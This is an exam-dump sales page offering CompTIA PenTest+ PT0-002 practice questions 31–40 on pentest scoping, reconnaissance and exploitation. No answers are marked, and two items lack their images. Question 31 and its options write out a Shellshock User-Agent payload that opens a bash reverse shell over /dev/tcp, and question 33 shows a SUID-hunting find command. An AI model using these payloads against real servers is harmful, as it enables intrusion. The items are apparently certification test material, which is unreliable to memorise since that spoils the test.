Pre-Summer Sale Limited Time 65% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: 65pass65

PT0-002 CompTIA PenTest+ Certification Exam is now Stable and With Pass Result | Test Your Knowledge for Free

Exams4sure Dumps

PT0-002 Practice Questions

CompTIA PenTest+ Certification Exam

Last Update 4 days ago
Total Questions : 464

Dive into our fully updated and stable PT0-002 practice test platform, featuring all the latest PenTest+ exam questions added this week. Our preparation tool is more than just a CompTIA study aid; it's a strategic advantage.

Our free PenTest+ practice questions crafted to reflect the domains and difficulty of the actual exam. The detailed rationales explain the 'why' behind each answer, reinforcing key concepts about PT0-002. Use this test to pinpoint which areas you need to focus your study on.

PT0-002 PDF

PT0-002 PDF (Printable)
$43.75
$124.99

PT0-002 Testing Engine

PT0-002 PDF (Printable)
$50.75
$144.99

PT0-002 PDF + Testing Engine

PT0-002 PDF (Printable)
$63.7
$181.99
Question # 31

A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/127.0.0.1/9090 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

Options:

A.  

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i id;whoami”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

B.  

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& find / -perm -4000”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

C.  

exploits = {“User-Agent”: “() { ignored;};/bin/sh –i ps –ef” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

D.  

exploits = {“User-Agent”: “() { ignored;};/bin/bash –i>& /dev/tcp/10.10.1.1/80” 0>&1”, “Accept”: “text/html,application/xhtml+xml,application/xml”}

Discussion 0
Question # 32

When preparing for an engagement with an enterprise organization, which of the following is one of the MOST important items to develop fully prior to beginning the penetration testing activities?

Options:

A.  

Clarify the statement of work.

B.  

Obtain an asset inventory from the client.

C.  

Interview all stakeholders.

D.  

Identify all third parties involved.

Discussion 0
Question # 33

A penetration tester runs the following command on a system:

find / -user root –perm -4000 –print 2>/dev/null

Which of the following is the tester trying to accomplish?

Options:

A.  

Set the SGID on all files in the / directory

B.  

Find the /root directory on the system

C.  

Find files with the SUID bit set

D.  

Find files that were created during exploitation and move them to /dev/null

Discussion 0
Question # 34

Deconfliction is necessary when the penetration test:

Options:

A.  

determines that proprietary information is being stored in cleartext.

B.  

occurs during the monthly vulnerability scanning.

C.  

uncovers indicators of prior compromise over the course of the assessment.

D.  

proceeds in parallel with a criminal digital forensic investigation.

Discussion 0
Question # 35

Which of the following types of information should be included when writing the remediation section of a penetration test report to be viewed by the systems administrator and technical staff?

Options:

A.  

A quick description of the vulnerability and a high-level control to fix it

B.  

Information regarding the business impact if compromised

C.  

The executive summary and information regarding the testing company

D.  

The rules of engagement from the assessment

Discussion 0
Question # 36

A penetration tester who is performing a physical assessment of a company’s security practices notices the company does not have any shredders inside the office building. Which of the following techniques would be BEST to use to gain confidential information?

Options:

A.  

Badge cloning

B.  

Dumpster diving

C.  

Tailgating

D.  

Shoulder surfing

Discussion 0
Question # 37

A penetration tester performs the following command:

curl –I –http2 https://www.comptia.org

Which of the following snippets of output will the tester MOST likely receive?

Question # 37

Options:

A.  

Option A

B.  

Option B

C.  

Option C

D.  

Option D

Discussion 0
Question # 38

A penetration tester has obtained shell access to a Windows host and wants to run a specially crafted binary for later execution using the wmic.exe process call create function. Which of the following OS or filesystem mechanisms is MOST likely to support this objective?

Options:

A.  

Alternate data streams

B.  

PowerShell modules

C.  

MP4 steganography

D.  

PsExec

Discussion 0
Question # 39

A penetration tester wants to identify CVEs that can be leveraged to gain execution on a Linux server that has an SSHD running. Which of the following would BEST support this task?

Options:

A.  

Run nmap with the –o, -p22, and –sC options set against the target

B.  

Run nmap with the –sV and –p22 options set against the target

C.  

Run nmap with the --script vulners option set against the target

D.  

Run nmap with the –sA option set against the target

Discussion 0
Question # 40

You are a penetration tester running port scans on a server.

INSTRUCTIONS

Part 1: Given the output, construct the command that was used to generate this output from the available options.

Part 2: Once the command is appropriately constructed, use the given output to identify the potential attack vectors that should be investigated further.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question # 40

Question # 40

Options:

Discussion 0
Get PT0-002 dumps and pass your exam in 24 hours!

Free Exams Sample Questions